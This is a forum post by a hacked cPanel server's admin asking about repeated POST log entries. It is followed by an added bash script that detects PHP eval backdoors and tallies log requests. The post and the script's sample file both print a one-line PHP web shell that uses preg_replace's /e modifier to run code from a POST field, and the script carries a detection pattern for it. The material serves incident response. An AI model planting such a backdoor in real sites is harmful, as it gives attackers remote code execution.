Server has been hacked. CXS Cleaned it up but hackers keep uploading scripts
On Centos X64 / Apache / WHM / Cpanel
When I look in my apache_logs I see THOUSANDS of these types of LOGS. Various days, always a different IP, over and over and over. What are they trying to do? Are they using an exploit of some sort? I have root access, so I can search for things if someone has an idea?
24.159.0.128 - - [19/May/2017:05:30:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:32:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:34:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:36:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:38:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:40:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
Also, in one of their uploaded hack scripts that CXS blocked, I see this:
EEC4D8E4439299046B8CDB3F782<?php @preg_replace ("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>
Is there something I can search for? Any help would be appreciated!
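One way to search for what the post describes, as an added example that is not part of the original post: `preg_replace` with the `/e` modifier evaluates its replacement string as PHP code, so the quoted snippet executes whatever arrives in the `xbfk` POST field. The script below lists files containing that construct and counts `POST /` requests per client in a combined-format access log. The function names, file names and sample data are assumptions made for the example.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. All names and paths are assumptions.

# find_eval_backdoors DIR: list text files that call preg_replace with a
# "/.../" pattern whose modifiers include e (replacement is run as PHP code).
# Only the "/" delimiter used in the quoted snippet is covered.
find_eval_backdoors() {
    grep -rIliE \
      "preg_replace[[:space:]]*\([[:space:]]*[\"']/[^\"']*/[a-z]*e[a-z]*[\"']" \
      "$1" 2>/dev/null | sort
}

# post_root_by_ip LOGFILE: count POST requests to "/" in a combined-format
# access log, grouped by client IP, status and response size, busiest first.
post_root_by_ip() {
    awk '$6 == "\"POST" && $7 == "/" { n[$1 " " $9 " " $10]++ }
         END { for (k in n) print n[k], k }' "$1" | sort -rn
}

# make_sample DIR: write constructed test input. bad.php holds the snippet
# quoted in the post, ok.php is harmless, and the log lines are modelled on
# the post with a shortened user agent plus one GET from a documentation IP.
make_sample() {
    cat > "$1/bad.php" <<'EOF'
<?php @preg_replace ("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>
EOF
    cat > "$1/ok.php" <<'EOF'
<?php echo preg_replace("/e+/", "x", $s); ?>
EOF
    cat > "$1/access_log" <<'EOF'
24.159.0.128 - - [19/May/2017:05:30:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0"
24.159.0.128 - - [19/May/2017:05:32:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0"
24.159.0.128 - - [19/May/2017:05:34:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0"
192.0.2.10 - - [19/May/2017:05:35:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
EOF
}

# Run "script demo" to try both functions on the constructed sample.
if [ "${1:-}" = "demo" ]; then
    d=$(mktemp -d); make_sample "$d"
    find_eval_backdoors "$d"; post_root_by_ip "$d/access_log"
    rm -rf "$d"
fi
```

Files listed by `find_eval_backdoors` are candidates for review rather than confirmed malware, since old legitimate code can also use `/e`.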